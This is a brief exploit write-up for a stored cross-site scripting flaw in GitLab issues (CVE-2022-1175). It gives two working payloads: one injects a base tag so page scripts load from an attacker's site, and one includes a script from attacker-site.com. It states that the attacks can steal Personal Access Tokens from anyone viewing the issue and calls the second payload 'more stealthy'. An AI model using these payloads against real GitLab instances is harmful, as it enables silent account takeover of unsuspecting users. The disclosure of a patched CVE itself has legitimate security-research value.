Gitlab Stored XSS, can be set in an issue on a project, either your own or another users. Allows attacks such as creating & stealing a Personal Access Token (PAT) of anyone who visits an issue. PAT's can then provide full Gitlab API access as that user equivilent to a full account takeover.
Can be abused by changing the base of the project to your site, so scripts are sourced by your site. Change javascript on your site to match the script names being called in the page. This can break things on the page though.
<pre data-sourcepos=""%22 href="x"></pre><base href=http://unsafe-website.com/><pre x=""><code></code></pre>
Standard script include also works depending on the sites CSP policy. This is more stealthy.
<pre data-sourcepos=""%22 href="x"></pre><script src="https://attacker-site.com/bad.js"></script><pre x=""><code></code></pre>
GitLab devs handily included the full XSS string in the code which can be found here:
https://gitlab.com/gitlab-org/gitlab/-/compare/v14.9.1-ee...v14.9.2-ee?from_project_id=278964&page=4
Reference:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1175